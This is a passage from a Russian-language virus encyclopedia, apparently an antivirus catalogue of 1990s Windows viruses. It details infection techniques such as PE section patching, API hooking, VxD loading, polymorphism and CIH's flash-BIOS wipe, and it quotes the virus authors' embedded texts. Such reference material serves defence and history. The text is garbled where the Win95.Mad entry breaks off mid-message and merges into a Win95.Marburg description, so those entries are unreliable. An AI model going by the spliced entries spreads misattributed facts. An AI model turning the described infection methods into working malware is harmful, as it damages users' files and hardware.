PLEASE REMEMBER239 После чего уничтожает содержимое CMOS-памяти и сдвигает на 16 байт "вверх" содержимое сектора MBR, причем признак загрузки второго диска устанавливает в 0. Имеет текст "WHEREX".

WhiteAwe.2675

Неопасный резидентный полиморфный вирус. Иногда выводит на экран "летающего привидения", очень похожего на привидение-Карлсона из мультфильма по известной сказке Астрид Линдгрен, ждет нажатия на любую клавишу, после чего выводит текст "White Awe will appear later...".

Win.CyberRiot

Очень опасный "резидентный" вирус. Заражает EXE-файлы в формате NewExe. При старте инфицированного EXE-файла вирус пытается заразить модуль KERNEL (KERNEL286.EXE или KERNEL386.EXE, в зависимости от компьютера,на котором работает система). При заражении KERNEL вирус не создает новые секции модуля, а "раздвигает" уже имеющиеся и дописывает свой код в конец 2-ого кодового сегмента, а также он переустанавливает на себя адрес экспортируемой функции WinExec. В результате при загрузке такого зараженного модуля KERNEL, вирусный код остается "резидентным" в памяти и получает контроль ко всем запускаемым NewExe-программам через функцию WinExec. Эти запускаемые программы вирус заражает стандартным способом: создает новый кодовый сегмент в заголовке NE и записывает свой код в конец файла.В поле контрольной суммы NE-заголовка вирус записывает свой идентификатор "LROY". В зависимости от некоторых условий вирус выводит на экран MessageBox с заголовком "Chicago 7: Cyber riot" и помещает внутрь один из следующих текстов,после чего уничтожает содержимое диска. Сообщения вируса:
С 29 апреля по 1 мая:
Happy anniversary, Los Angeles!
Anarchists of the world, unite!
В пятницу между 1 и 13 числами:
When the levee breaks, I have no place to stay...
(Crying won't help you. Praying won't do you no good.)
С 26 по 31 декабря, 6 марта и после 1994 года:
Save the Whale, harpoon a fat cat.
Вирус содержит тексты:
USER KERNEL Chicago-7 CyberRiot, 15.1.1993 Klash (Werner L.)
Sommer 1993: 15 Windowscomputerviren
Source code avaiable for $15,000,000. Serious inquiries only.
Why does IBM need to lay me off? Oh well, their loss.
McAfee's FUD equation: !!!!!!+??????=$$$$$$
Convict the pigs
This program was written in the cities of Hamburg, Chicago, Seattle and
Berkeley. Copyright © 1993 Klash/Skism/George J/Phalcon/Henry
Buscombe and 2 ex-Softies, collectively known as the Chicago 7.
Coming soon: Diet riot. Same great aftertaste--fewer bytes.

Win.Homer

Неопасный "резидентный" вирус. Написан на C++. Заражает NewExe-файлы формата Windows 3.1x. При старте инфицированного файла вирус остается Windows-задачей и "перехватывает" INT 21h. При запуске NewExe-файлов вирус заражает их. Существует предположение, что вирус перехватывает сетевые пакеты и может, используя File Transfer Protocol, передать свою копию на удаленный сервер в каталог INCOMING.

Win.Lamer

Неопасный нерезидентный полиморфный вирус. Заражает EXE-файлы в формате NewExe (файлы для MS-Windows). Данный вирус является первым представителем, использующим полиморфный механизм заражения для файлов MS-Windows. Вирус производит поиск *.EXE-файлов на текущем диске и их заражение, причем производится попытка поиска и заражения файлов в каталоге \WINDOWS на текущем диске. Содержит тексты "WinLamer2 ©Copyright Aug, 1995 by Burglar in Taipei, Taiwan." и "PME for Windows v0.00 © Jul 1995 By Burglar".

Win.Tentacle.1958

Неопасный нерезидентный вирус, заражающий NewExe *.EXE-файлы в текущем каталоге и в каталоге C:\WINDOWS. При нахождении NewExe файла вирус создает файл C:\TENTACLE.$$$, в который записывает инфицированную копию NewExe-файла. После чего исходный файл удаляется, а файлу TENTACLE.$$$ присваивается его имя. Иногда вирус может заместить текущую иконку, находящуюся в теле заражаемого файла на свою. На вирусной пиктограмме изображено щупальце осьминога и надпись "TENTACLE".

Win.Tentacle.10634

Неопасный нерезидентный вирус, заражающий NewExe *.EXE-файлы в текущем каталоге и в каталогах C:\WIN,C:\WINDOWS,C:\WIN31, C:\WIN311, C:\WIN95. Процедура заражения похожа на процедуру вируса Win.Tentacle.1958, но Win.Tentacle.10634 при заражении не изменяет точку входа NE-файла.Вирус создает новый кодовый сегмент, в который записывает свой код, и соответствующую этому сегменту - сегментную секцию в заголовке NE. Для того, чтобы получить управление вирус изменяет один элемент в таблице перемещаемых элементов. Вирус ищет ссылку на процедуру KERNEL -INITTASK или на процедуру VBRUN300 - THUNRTMAIN и заменяет ее на свой стартовый код. Процедуры INITTASK и THUNRTMAIN вызываются практически сразу при старте Windows-программ. В результате вместо вызова этих стандартных процедур произойдет вызов вирусного кода. После поиска и заражения файлов вирус отдает управление этим процедурам, которые в свою очередь вернут управление инфицированной программе-носителю. При обнаружении файла WINHELP.EXE вирус исправляет команду условного перехода (74 ??) на безусловный переход (EB ??). При старте инфицированной программы с часу до двух часов ночи, вирус создает файл C:\TENTACLE.GIF и записывает в него изображение щупальца осьминога в GIF-формате. В поле "Extensions" для просмотра *.GIF-файлов вирус записывает имя "своего" GIF-файла - C:\TENTACLE.GIF. В результате при просмотре любого GIF- файла система будет всегда показывать щупальце осьминога. Для этих манипуляций вирус использует вызовы SHELL: REGSETVALUE и REGQUERYVALUE.

Win.Twitch (1,2)

Неопасные нерезидентные вирусы-спутники. Производят поиск NewExe *.EXE- файлов, присваивают им расширение OVL и записывают свой код под оригинальным именем файла. Содержат тексты:
BOOT SHELL SYSTEM.INI PATH TEMP OVL \ CHKLIST.CPS *.EXE
NETWARE FILEMAN SCRNSAVE WINPRINT WINDOWS
DeviceSelectedTimeout
LOAD .EXE \SYSTEM SYSEDIT.EXE NWPOPUP.EXE

Win.Vik (1-3)

Неопасные нерезидентные вирусы. Производят поиск и заражение NewExe *.EXE и *.DLL - файлов в текущем каталоге. Win.Vik (2,3) содержат текст "© 1994 American Eagle Publications Inc., All rights reserved.".

Win.Vir1.4

Неопасный нерезидентный вирус, заражающий файлы в формате NewExe. Содержит текст "Virus_for_Windows v1.4".

Win.Winsurf.1171, 1432

Неопасные резидентные вирусы, заражающие файлы в формате NewExe (NE). При запуске инфицированной программы, вирусы проверяют наличие DPMI и присутствие своих копий в памяти компьютера. Если резидентные копии вирусов не установлены и DPMI-интерфейс существует,то вирусы производят поиск строки "windir=" в своем окружении (environment), открывают файл SYSTEM.INI в каталоге, указанном в переменной "windir=", ищут в данном файле строку "shell=" и производят заражение файла,следующего за данной строкой. Обычно строка "shell=" для MS-Windows 3.xx указывает на файл PROGMAN.EXE (Program Manager). Данная программа является резидентной в течение всего сеанса работы MS-Windows. Т.о., вирус,внедренный в данную программу, также будет являться резидентным. Вирусы с помощью DPMI "перехватывают" INT 21h, "контролируют" запуск программ (Exec f.4bh Int 21h) и заражают NewExe-файлы.

Win.Wintiny

Неопасный нерезидентный вирус. Содержит текст "WinTiny ©Copyright June, 1995 by Burglar in Taipei, Taiwan.".

Win32.Cabanas (5)

Win32.Cabanas является первым из известных вирусов, поражающих файлы семейства 32хразрядных операционных систем Microsoft Windows (Win32s/Windows 95/Windows NT). Данный вирус умеет не только заражать файлы в формате PortableExecutable, но оставаться резидентно на текущий сеанс работы инфицированной программы в любой из перечисленных выше операционных систем. Все существовавшие до сих пор вирусы, написанные для Windows 95, не умели корректно заражать файлы, предназначенные для работы в Windows NT, т.к., хотя файлы для Windows 95 и Windows NT и имеют одинаковый PE - формат, но все же некоторые поля в заголовке PE у них различаются. Поэтому при заражении файлов Windows NT, вирусам необходимо предпринимать дополнительные действия для корректной модификации PE- заголовка. Иначе система Windows NT выдаст ошибку на этапе загрузки данного файла. Также представляется определенной проблемой для вирусов- это определение базовых адресов WIN32 KERNEL API в памяти,т.к., Windows 95 и Windows NT располагают модуль KERNEL32.DLL в разных адресах памяти. Но Win32.Cabanas прекрасно справляется с данными проблемами. При старте инфицированного файла вирус получает управление, распаковывает и расшифровывает собственную таблицу WIN32 KERNEL API имен процедур, необходимых ему для последующей работы и приступает к определению базового адреса KERNEL32.DLL и адресов всех интересующих его функций WIN32 KERNEL API. Во время заражения файла вирус анализирует таблицу импортируемых функций (Import Table) с целью нахождения имен функций GetModuleHandleA, GetModuleHandleW и GetProcAddress. При нахождении данных имен вирус запоминает в своем коде смещения адресов данных процедур, находящихся в Import Table (как правило, в сегменте .idata). Если имена перечисленных процедур вирусом не будут найдены, то Win32.Cabanas в дальнейшем, при запуске инфицированного файла, будет использовать другой недокументированный способ нахождения базового адреса KERNEL32 и адресов WIN32 KERNEL API. Но этот недокументированный способ содержит ошибки и работает некорректно в среде Windows NT. Итак, если адреса импортируемых функций GetModuleHandleA или GetModuleHandleW имеются в Import Table инфицированного файла, то вирус без проблем, с помощью процедуры GetProcAddress, определяет все адреса WIN32 KERNEL API. Если адресов интересующих его функций в Import Table нет, то вирус с помощью некоторых ухищрений пытается определить адрес GetProcAddress в таблице экспортируемых функций KERNEL32. Но, как уже отмечалось выше, для Windows NT данный вирусный механизм не работает из-за ошибок, и, как следствие, нормальная "жизнедеятельность" вируса окажется невозможной. Это единственная серьезная ошибка Win32.Cabanas, из-за которой у него возникают проблемы при распространении в среде Windows NT. Зато в Windows 95 чувствует себя, "как рыба в воде" и безо всяких трудностей (в случае отсутствия адресов функций GetModuleHandleA или GetModuleHandleW) определяет базовый адрес KERNEL32.DLL и функции GetProcAddress другим недокументированным способом. При помощи функции GetProcAddress вирус может получить адрес любой интересующей его процедуры WIN32 KERNEL API. Что он и делает: получает адреса и запоминает их. Далее вирус запускает свою процедуру заражения PE-файлов, имеющих расширения EXE и SCR в каталогах \WINDOWS, \WINDOWS\SYSTEM и в текущем директории. При заражении файлов вирус проверяет наличие в них собственной копии по некоторым полям в заголовке PE и по длине файла, которая при заражении вирусом Win32.Cabanas должна быть кратна 101. Как уже отмечалось выше вирус производит поиск имен функций GetModuleHandleA, GetModuleHandleW или GetProcAddress в таблице импортируемых функций (Import Table) и запоминание ссылок на их адреса. Затем вирус записывает свой код в конец файла, в область последней сегментной секции (обычно .reloc), изменив характеристики и длину данной секции. После того, как тело вируса записано в конец файла, вирус изменяет пять начальных байт оригинальной точки входа кодовой секции (обычно .text или CODE) на команду передачи управления на вирусный код, находящийся в последней сегментной секции (.reloc). Для этих целей вирус производит анализ таблицы перемещаемых элементов (.reloc) с целью возможного нахождения какого-нибудь элемента в области измененных вирусом байт. Если такая ссылка будет найдена, то вирус "выключает" ее и запоминает ее адрес и значение для того, чтобы впоследствии при передаче управления программе-вирусоносителю не забыть восстановить исходные байты точки входа и, если необходимо, то соответствующим образом настроить перемещаемый элемент (relocation). После того, как вирус заразит все "пригодные" для этой цели файлы в указанных выше каталогах, он приступает к установке в систему своей резидентной копии и "перехвату" интересующих его системных функций. С помощью функции VirtualAlloc вирус выделяет себе область памяти длиной 12232 байт и перемещает свой код в данную область. Далее вирус пытается "перехватить" следующие функции WIN32 KERNEL API: GetProcAddress, GetFileAttributesA,GetFileAttributesW, MoveFileExA,MoveFileExW,_loopen, CopyFileA, CopyFileW, OpenFile, MoveFileA, MoveFileW, CreateProcessA, CreateProcessW, CreateFileA, CreateFileW, FindClose, FindFirstFileA, FindFirstFileW,FindNextFileA, FindNextFileW, SetFileAttrA,SetFileAttrW. Адреса этих функций вирус "забирает" из Import Table, а в поля Import Table подставляет адреса собственных обработчиков. Если некоторые интересующие его функции вирусу "перехватить" не удалось, то в дальнейшем при вызове программой функции GetProcAddress, вирус проверяет нужен ли ему адрес данной функции и при необходимости возвращает программе адрес собственной процедуры. При вызове программами некоторых "перехваченных" вирусом функций запускается процедура заражения файлов и\или процедуру стелс-режима для инфицированных файлов. Так при вызове функций FindFirstFileA, FindFirstFileW, FindNextFileA или FindNextFileW вирус может заразить файл, поиск которого производится, после чего сразу же скрыть приращение длины в данном файле. Таким образом, Win32.Cabanas нельзя назвать "полностью резидентным" вирусом, т.к., "перехват" системных функций и установка вирусной копии в выделенный системой участок памяти производится только на текущий сеанс работы инфицированной программы. Но, что произойдет если пользователь запустит, например, инфицированный Norton Commander for Windows 95 или Command Interpreter for Windows NT? Или программу, которая остается в памяти резидентно? Правильно - вместе с такой программой, до тех пор пока данная программа не будет завершена, будет "трудиться" и Win32.Cabanas. Win32.Cabanas содержит зашифрованный текст "© Win32.Cabanas v1.0 by jqwerty/29A".

Win95.Apparition

Опасный полиморфный вирус, заражающий *.EXE файлы в фоpмате Portable Executable (PE). Hаписан на языке Borland C++, содеpжит в своем теле компpессиpованные файлы с исходными текстами, имеет значительный pазмеp - около 80 Kb и занимает около 200 Kb памяти. Пpи заpажении дописывает свой код и исходные тексты в начало файла, стаpое содеpжимое поpтит, замещая опpеделенные байты кода пpогpаммы байтами 0FFh, 0FFh, ? (? - байт со случайным значением в диапазоне от 0 до 255). При запуске инфициpованной пpогpаммы виpус пpовеpяет в секции [WinApp32] файла Win.Ini наличие пеpеменных "Logging", "ShowDotsOn" и "NoInfect", упpавляющих pежимами его pаботы, устанавливает собственный обpаботчик кpитических ошибок, опpеделяет тип опеpационной системы, пеpеносит свой код из инфициpованного файла в память, котоpая будет использоваться для заpажения файлов, и загpужает инфициpованную пpогpамму. Для этого он создает вpеменный файл, пеpеносит в него код и данные, находящиеся за телом виpуса, и запускает этот вpеменный файл на исполнение в pежиме отладки. Виpусный обpаботчик особых ситуаций отладки получает упpавление пpи исполнении инстpукций, замененных виpусом, и восстанавливает измененные байты кода. После загpузки пpогpаммы виpус пpовеpяет наличие своей копии и, если она активна, завеpшает pаботу. Иначе он создает стандаpтное "скрытое" окно, устанавливает обpаботчики системных событий и начинает обычный для Windows-пpиложений цикл их обpаботки. Пpи получении упpавления по событию от системного таймеpа виpус сканиpует каталоги, начиная с коpневого каталога пеpвого доступного логического диска. Пpи каждом обpабатываемом сигнале таймеpа виpус ищет следующий файл или каталог и таким обpазом оpганизует поиск файлов-жеpтв. Если pасшиpение файла ".EXE" и имя не "BCC32", виpус пpедпpинимает попытку опpеделить тип файла и, если файл имеет фоpмат Portable Executable и пеpеменная "NoInfect" в файле Win.Ini не имеет значения "Yes", заpажает его. Для этого он создает вpеменный файл, записывает в него свое тело, компpессиpованные исходные тексты и дописывает заpажаемый файл. Пpи записи файла-жеpтвы виpус ищет последовательности из 3 опpеделенных байт и заменяет пеpвые два байта на 0FFh, последний - на байт со случайным значением в диапазоне от 0 до 255. Поскольку пpи этом виpус не пpоизводит никаких дополнительных пpовеpок, некотоpые пpогpаммы могут быть безнадежно испоpчены. Если же имя найденного файла - BCC32.EXE, виpус пpовеpяет наличие на диске дpугих файлов компилятоpа Borland C++ и, если они пpисутствуют, пpиступает к генеpации очеpедной полимоpфной копии. Сначала он pаспаковывает файлы со своими исходными текстами и сохpаняет их во вpеменном каталоге. Затем он начинает создавать их копии, пpичем после записи каждой стpоки может пpоисходить генеpация исходного текста "мусоpного" кода - вызовов некотоpых функций API, аpифметических опеpаций, пpоцедуp-"пустышек", объявлений неиспользуемых пеpеменных и т.д. После записи копий виpус создает файл pесуpсов и некотоpые дpугие файлы, необходимые для компиляции полученных исходных текстов, котоpую виpус и осуществляет пpи помощи найденных пpогpамм Borland C++. Если компиляция закончилась успешно, виpус аpхивиpует исходные тексты утилитой EXTRACT.EXE, пеpезаписывает в них некотоpые значения пеpеменных, зависящие от pазмеpов полученного исполняемого модуля и упакованных текстов, и пеpекомпилиpует пpоект. После этого все вpеменные файлы удаляются, а содеpжимое полученного исполняемого модуля и аpхивиpованных исходных текстов замещает буфеpа в памяти, пpедназначенные для заpажения файлов.

Win95.Boza (1-4)

Неопасный нерезидентный вирус, заражающий NewExe файлы в формате PE (MS-Windows'95) в текущем каталоге диска. При заражении файлов вирус использует прямые вызовы в модуль KERNEL32 по определенным адресам. У инфицированного файла вирус инкрементирует количество секций в PE - заголовке (NumberOfSections) и создает новую секцию с именем ".vlad". 31 числа вирус выводит на экран сообщение:
Bizatch by Quantum / VLAD
The taste of fame just got tastier!
VLAD Australia does it again with the world's first Win95 Virus
From the old school to the new..
Metabolis
Qark
Darkman
Automag
Antigen
RhinceWind
Quantum
Absolute Overlord
CoKe
Также вирус содержит текст "Please note: the name of this virus is [Bizatch] written by Quantum of VLAD".Win95.Boza содержит массу ошибок, в результате которых "нормальная жизнедеятельность" вируса,практически, невозможна.

Win95.CIH (1-3)

Очень опасный резидентный вирус. Заражает файлы в формате EXE PE под управлением операционной системы Windows 95. При заражении файлов вирус не увеличивает их длины, а использует довольно интересный механизм заражения файлов. Каждая кодовая секция EXE PE файла выравнена на определенное количество байт, обычно, не используемых программой. В такие области вирус и записывает части своего кода, "разбрасывая" их иногда по всему файлу (или по всем кодовым секциям). А также вирус может записать свою стартовую процедуру (процедуру, первой получающей управление при запуске программы) или даже весь свой код в область заголовка EXE PE файла и установить точку входа программы на эту стартовую процедуру. Таким образом, точка входа файла может не принадлежать ни одной кодовой секции файла. При получении управления вирус выделяет себе блок памяти посредством вызова функции PageAllocate и "собирает себя по частям" в единое целое в этом выделенном участке памяти. Далее Win95.CIH перехватывает IFS API и отдает управление программе-вирусоносителю. При открытии файлов с расширением EXE и форматом PE вирус инфицирует их. 26 числа каждого месяца вирус уничтожает содержимое Flash BIOS, записывая в него случайные данные ("мусор"). В результате после первой же перезагрузки компьютер перестает загружаться. И, как правило, даже в промышленных условиях восстановить содержимое Flash BIOS и вернуть работоспособность компьютеру достаточно сложно. Я РЕКОМЕНДУЮ всем пользователям современных компьютеров установить ПЕРЕКЛЮЧАТЕЛЬ на материнской плате компьютера в положение, запрещающее ЗАПИСЬ во Flash BIOS! Иначе ВЫ можете НАВСЕГДА ПОТЕРЯТЬ свой компьютер! В настоящее время существует 3 модификации вируса Win95.CIH длиной 1003, 1010 и 1019 байт. Данные вирусы содержат в своем теле тексты:
Win95.CIH.1003 - CIH v1.2 TTIT
Win95.CIH.1010 - CIH v1.3 TTIT
Win95.CIH.1019 - CIH v1.4 TATUNG

Win95.Companion

Неопасный нерезидентный вирус-спутник. Производит поиск *.EXE-файлов в формате PE (Win95/NT) в текущем каталоге и заражение их. Вирус присваивает PE-EXE-файлу расширение COM и записывает свой код в файл с расширением EXE, вместо программного кода.

Win95.Harry.1536 (1,2), 2560

Опасные "резидентные" вирусы. Заражают PE EXE-файлы. При старте инфицированного файла вирусы внедряются в ядро Windows 95, в область данных драйвера VMM (если там есть свободное место) и "перехватывают" файловые функции системы (IFS API). При открытии PE EXE-файлов вирусы заражают их, записываясь в конец этих файлов в область последней секции и модифицируя PE заголовок (характеристики последней сегментной секции). Win95.Harry.2560 проявляется интересным видео-эффектом - изменяет курсор мыши на изображение медицинского шприца. Для этих целей вирус создает файл C:\suringe.cur и регистрирует его в системе. Win95.Harry.1536 содержит текст "Anxiety.Poppy.95 by Vicodin", Win95.Harry.2560 имеет строки "Fuck Harry by Quantum / VLAD", "\Control Panel\Cursors", "Arrow".

Win95.HPS

Неопасный резидентный полиморфный вирус. Заражает *.EXE и *.SCR файлы в формате PE. При старте вирус расшифровывает свой код и пытается определить базовый адрес модуля KERNEL32.DLL. Далее с помощью недокументированных приемов вирус определяет адрес функции VxDCall и проверяет наличие своей копии в памяти. Если код вируса в памяти не обнаружен, то c помощью найденного адреса VxDCall посредством функций VMM: PageReserve и PageCommit вирус выделяет себе блок памяти, в который копирует собственный код. Затем вирус "перехватывает" вызов функции VWIN32_Int21h_Dispatcher и устанавливает для него собственный обработчик. Данный вирусный обработчик возвращает ответ "я здесь" на запрос о наличии собственной копии в памяти, а также при открытии PE- файлов вызывает процедуру их заражения. При вызове функций FindFirst и FindNext вирус "скрывает" приращение длин инфицированных файлов. В субботу при открытии файлов графических изображений в формате BMP вирус переворачивает их изображение. При своей установке в память вирус генерирует свою полиморфную копию, которой в дальнейшем будут заражаться все файлы в текущем сеансе работы. Такой вирус называется "медленным полиморфиком" (slow polymorphic). При заражении файлов вирус записывает себя в область последней кодовой секции, изменяя ее характеристики и точку входа в исполняемый модуль. Вирус удаляет файлы ANTI-VIR.DAT, CHKLIST.MS, AVP.CRC, IVB.NTZ. Имеет в своем коде антиотладочные механизмы, базирующиеся на установке отладчиками обработчиков исключительных ситуаций (SEH). Содержит текст:
< Hantavirus Pulmonary Syndrome (HPS) Virus BioCoded by GriYo / 29A >

Win95.Inca

Опасный резидентный полиморфный файлово-загрузочный вирус. Win95.Inca заражает EXE файлы в формате PE (Portable Executable) для операционной системы Windows 95/98 и загрузочные сектора гибких дисков. А также Win95.Inca является вирусом-червем для ARJ, LHA, LZH, PAK, RAR и ZIP - архивов и программы mIRC32. При старте инфицированного PE EXE - файла, вирус получает управление и полиморфный декриптор расшифровывает основной код вируса. Причем расшифровка производится достаточно необычным способом - в первоначальном варианте основной вирусный код представляет собой таблицу индексов или смещений оригинальных байтов вирусного тела. И под расшифровкой в данном случае следует понимать оригинальную подстановку или трансляцию расшифровщиком вирусных байт на место их однобайтовых индексов или смещений. После данной "сборки" своего кода вирус определяет по "уже стандартному" для данных типов вирусов алгоритму адреса интересующих его функций в KERNEL32.DLL и создает на диске файл C:\W95INCA.COM, в который записывает код полиморфного DOS COM дроппера. Данный полиморфный 16-тиразрядный DOS код уже был сгенерирован при заражении PE EXE - файла, поэтому "дополнительных усилий" для создания полиморфной копии вирусом на данном этапе не предпринимаются. После чего созданный файл закрывается, запускается вирусом на выполнение и после некоторой задержки - удаляется. Далее вирус отдает управление инфицированному PE файлу - вирусоносителю. Это все действия, которые выполняет вирусный код, находящийся в PE EXE - файле. Поэтому, можно рассматривать инфицированные PE EXE - файлы, как дропперы. Запущенный на выполнение файл C:\W95INCA.COM, определяет Windows директорию (WINDIR) и пытается создать в каталоге \WINDOWS\SYSTEM файл с именем FONO98.VXD. При удачной попытке вирус распаковывает по простейшему алгоритму код своего 32-ухразрядного VxD - драйвера, который находится внутри 16-тиразрядного DOS кода, и записывает его в созданный им FONO98.VXD файл. Далее вирус открывает файл кофигурации Windows SYSTEM.INI, ищет в нем раздел "[386Enh]" и сразу после этой строки записывает строчку "device=fono98.vxd". После описанных манипуляций, или, если строка "device=fono98.vxd" уже присутствует в файле SYSTEM.INI, или файл FONO98.VXD был ранее создан в каталоге \WINDOWS\SYSTEM, или же, если вирусу не удалось найти каталог WINDOWS, то вирус завершает свою работу и возвращает управление DOS. После перезагрузки системы и при новом старте Windows вирусный VxD - драйвер FONO98.VXD загружается системой в память и получает управление. Первым делом вирусный виртуальный драйвер удаляет системный VxD - драйвер HSFLOP.PDR, находящийся в каталоге \WINDOWS\SYSTEM\IOSUBSYS. Затем вирус читает в память код из своего же драйвера FONO98.VXD и создает в памяти три разные полиморфные копии: для заражения PE EXE - файлов, для заражения загрузочных секторов флоппи-дисков и для создания 16-тиразрядных DOS программ-вирусов (дропперов) в формате COM - файлов. В дальнейшем, в текущем сеансе работы, до следующей перезагрузки системы вирус будет заражать указанные объекты только этими копиями. Win95.Inca относится к классу "медленных полиморфиков". Далее вирус "перехватывает" IFSMgr FileSystemApiHook и Int 13h (дисковые операции), устанавливая на них собственные обработчики событий. Вирусный обработчик IFSMgr контролирует открытие файлов. При открытии файлов с расширениями EXE и SCR, вирус проверяет их внутренний формат, и если открывающиеся файлы являются Portable Executable, то вирус заражает их, создав дополнительную кодовую секцию со случайным именем в заголовке PE - файла и записывая в ее область свой полиморфный код. При открытии архивных файлов c расширениями LHA, LZH, PAK, ZIP, ARJ или RAR, вирус дописывает к данным архивам свой 16-тиразрядный полиморфный код (червь) в формате COM - файла и модифицирует заголовки архивных файлов таким образом, что данный вирус-червь оказывается помещенным в архив в неупакованном виде (store format) и получает случайное имя, состоящее из четырех букв, и расширение COM или EXE (например, AAAA.COM или ABCD.EXE). При открытии файла MIRC32.EXE (программа для "разговора" в Интернет) вирус записывает или дописывает в конец файла конфигурации MIRC.INI строки "[fileserver]" и "Warning=Off". Также вирус создает заново (если они существовали на диске) файлы SCRIPT.OLD, SCRIPT.INI, INCA.EXE и REVENGE.COM. В файл INCA.EXE вирус записывает код полиморфного 16-тиразрядного вируса-червя. В файл REVENGE.COM записывается 231 байт троянского кода, перезаписывающего содержимое CMOS - памяти. А в файл SCRIPT.INI вирус записывает текст вирусного mIRC - червя. При старте программы MIRC32.INI по сценарию SCRIPT.INI первым делом производится запуск файла INCA.EXE. Далее по этому же сценарию производится посылка файлов SCRIPT.INI (mIRC - червя) и INCA.EXE (вирусного дроппера) на компьютеры всех участников "разговора" в Интернете. Если во время разговора появится текстовая строка "el_inca", то по сценарию SCRIPT.INI произведется запуск троянской программы REVENGE.COM. Если кем-либо будет "сказано слово" "ancev", то вирусный сценарий "допустит" этого "сказавшего слово" к диску C:. Даже если этот "сказавший слово" находится за тысячу верст от инфицированного компьютера. И если во время "разговора" появится текст "_29A_", то программа MIRC32.EXE завершит свою работу. Вирусный обработчик дисковых операций Int 13h контролирует чтение загрузочного сектора флоппи-диска A: и при возможности заражает его, заместив оригинальный загрузчик своим полиморфным, и записывая на диск еще свои копии. При загрузке системы с такого инфицированного флоппи-диска, вирусный загрузчик получит управление, прочитает из секторов диска в память весь свой код, "перехватит" Int 1Ch (таймер), а затем и Int 21h. Задача обработчика Int 21h простая - при первой же возможности попытаться создать в каталоге C:\WINDOWS\SYSTEM файл FONO98.VXD и зарегестрировать его в файле конфигурации SYSTEM.INI в разделе "[386Enh]". Задача точно такая же, как и вирусного дроппера C:\W95INCA.COM, алгоритм работы которого был описан в самом начале. Разница только в том, что дроппер C:\W95INCA.COM определял системный каталог Windows по переменной WINDIR. А обработчик Int 21h пытается разместить себя в определенном каталоге C:\WINDOWS\SYSTEM. После данной попытки (удачной или нет) вирус "отпускает" Int 21h и обезвреживает свою копию в памяти компьютера. Вирус содержит текст "El Inca virus". Размер вирусного VxD - драйвера составляет 15327 байта. Таким образом, все поражаемые вирусом объекты можно рассматривать, как вирусоносители или дропперы, кроме создаваемого вирусом VxD - драйвера. Этот VxD - драйвер устанавливает свою копию в память, и именно он, поражает все остальные объекты. Но ведь он не заражает "себе подобных"- VxD - драйверы. VxD - драйвер является только переносчиком инфекции, а не инфицированным объектом.

Win95.Jacky

Неопасный нерезидентный вирус, заражающий файлы в формате PE. При старте вирус пытается определить адреса системных файловых функций, находящихся в ядре Windows'95. Далее с помощью этих функций вирус производит поиск и заражение файлов. При заражении файла вирус изменяет характеристики последней сегментной секции файла, записывает в данную секцию свой код и устанавливает на него точку входа. Вирус содержит зашифрованные строки:
To My d34d fRi3nD c4b4n4s..
A Win/NT/95 ViRuS v1.00.
By: j4cKy Qw3rTy / 29A.
jqw3rty@cryogen.com

Win95.Mad

Неопасный нерезидентный шифрованный вирус. Алгоритм работы данного вируса очень похожи на алгоритмы вируса Win95.Jacky. Производит поиск *.EXE файлов в формате Win PortableExe (PE) в текущем и родительских каталогах и заражает их. При заражении файла вирус изменяет характеристики последней сегментной секции файла, ее стартовый адрес и размер, и записывает свой код в конец файла. В зависимости от текущего времени вирус может вывести окно сообщений с текстом:
Multiplatform Advanced Destroyer "перехватывает" некоторые функции Windows API, находящиеся в import table, и устанавливает свой код резидентно в память на сеанс работы инфицированной программы. Но следует отметить, что Win95.Marburg является первым известным "полноценным" полиморфным вирусом для среды Windows 95. Win95.Marburg - это "медленный полиморфик". В текущем сеансе работы вирус заражает файлы своей одной сгенерированной полиморфной копией. В некоторые моменты времени вирус может вывести в случайные места главного окна Windows 95 (desktop) иконки "ошибки" (красный круг с белым крестом посередине). Win95.Marburg удаляет файлы ANTI-VIR.DAT, CHKLIST.MS, AVP.CRC, IVB.NTZ. Содержит текст "[ Marburg ViRuS BioCoded by GriYo/29A ]".

Win95.Memorial

Неопасный резидентный полиморфный вирус,заражающий DOS COM и EXE-файлы, а также *.EXE и *.SCR-файлы в формате PortableExe (PE). Является первым известным полиморфным вирусом для операционной системы Windows'95. В DOS файлах и в VxD - драйвере вирус не зашифрован. При запуске инфицированного DOS файла, вирус проверяет наличие среды Windows и собственной резидентной копии в памяти компьютера. Если Windows загружена или вирусная копия уже присутствует в системе, то вирус не предпринимает никаких действий и отдает управление программе-носителю. Если же данные условия не выполняются, то вирус создает файл C:\CLINT.VXD (инфицированные EXE-файлы содержат ошибку в создании VxD- драйвера), записывает в него собственный распакованный вирусный код (в зараженных файлах код виртуального драйвера хранится в упакованном виде) и оставляет в области второй половины таблицы векторов прерываний резидентный код, который "контролирует" INT 2Fh. Данная резидентная копия не заражает файлы, а предназначена для возвращения ответа "я здесь" и для загрузки виртуального вирусного драйвера C:\CLINT.VXD при старте Windows. При инициализации Windows вирусный резидентный код получает управление и достаточно хитроумным способом, используя интерфейс Windows, "подсказывает" среде Windows, что необходимо загрузить резидентно в память драйвер C:\CLINT.VXD. Таким образом, вирус без манипуляций с файлом SYSTEM.INI загружает свой виртуальный драйвер. Данный драйвер контролирует файловые операции и при обращении к DOS COM и EXE-файлам, а также к *.EXE и *.SCR файлам в формате PE - заражает их. При заражении PE файлов, вирус создает дополнительную сегментную секцию с названием CLINTON (обычно данное название зашифровано) и записывает свой зашифрованный полиморфный код в конец файла. При старте инфицированного PE файла под Windows'95, вирус определяет адреса необходимых ему процедур в модулях KERNEL32 и USER32 и, при отсутствии вирусного резидентного кода в системе, создает вирусный виртуальный драйвер в корневом каталоге и загружает его в систему также очень интересным способом с помощью интерфейса Windows'95. Так, установка резидентной копии очень похожа по алгоритму, но различается по реализации для различных операционных сред. Хотя и в том, и в другом случае необходимо наличие Windows'95. 10 апреля вирус выводит окно сообщений с текстом:
Clinton Haines Memorial Virus by Quantum/VLAD and Qark/VLADh to do him justice.
VLAD Remembers. Rest in Peace

Win95.MrKlunky

Неопасный "резидентный" вирус. По способам внедрения в систему и заражению файлов очень похож на вирус Win95.Punch. При старте зараженного PE EXE-файла вирус создает файл MRKLUNKY.VXD в формате VxD-драйвера и регистрирует его в системе. При заражении файлов вирус создает новую сегментную секцию с именем MrKlunky и записывает свой код в конец файлов. Вирус создает файл C:\LOG.LOG, в который записывает имена всех заражаемых файлов.

Win95.Punch

